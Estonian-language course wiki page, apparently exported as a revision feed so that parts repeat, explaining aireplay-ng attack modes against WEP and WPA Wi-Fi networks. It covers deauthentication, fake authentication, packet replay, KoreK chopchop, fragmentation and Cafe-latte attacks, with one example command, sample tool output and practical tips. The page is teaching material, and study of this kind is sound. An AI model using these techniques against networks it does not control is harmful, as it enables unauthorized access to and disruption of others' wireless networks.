See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi &#039;&#039;plaintekst&#039;&#039; väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; .........&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0201-191706.cap&lt;br /&gt;
 Saving keystream in replay_dec-0201-191706.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine &#039;&#039;broadcasti&#039;&#039; ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab &#039;&#039;custom&#039;&#039; pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 target IP ja target MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib target MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub source IP - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
Valiidse ARP päringu saatmiseks kliendile peame liigutama source IP positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks incoming source IP positsioonile 33. Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
IP Paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks bit-flippingut. Sama meetodit kasutatakse ka ARP paketi source MAC&#039;i muutmiseks juhul kui seal on algselt multicast.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
\[\[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30977</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30977"/>
		<updated>2011-05-10T10:30:24Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Rünnak 5: Fragmentation attack */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta &#039;&#039;broadcastis&#039;&#039;.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP &#039;&#039;cache&#039;&#039; tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
12:35:25  Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud &#039;&#039;versus&#039;&#039; broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
15:49:32  Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nagu mainitud, &#039;&#039;broadcast&#039;&#039; lahtiühendamine on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.&lt;br /&gt;
&amp;lt;pre&amp;gt;15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA &#039;&#039;handshake&#039;&#039; paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud &#039;&#039;handshake&#039;&#039;`id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi &#039;&#039;plaintekst&#039;&#039; väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; .........&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0201-191706.cap&lt;br /&gt;
 Saving keystream in replay_dec-0201-191706.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine &#039;&#039;broadcasti&#039;&#039; ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
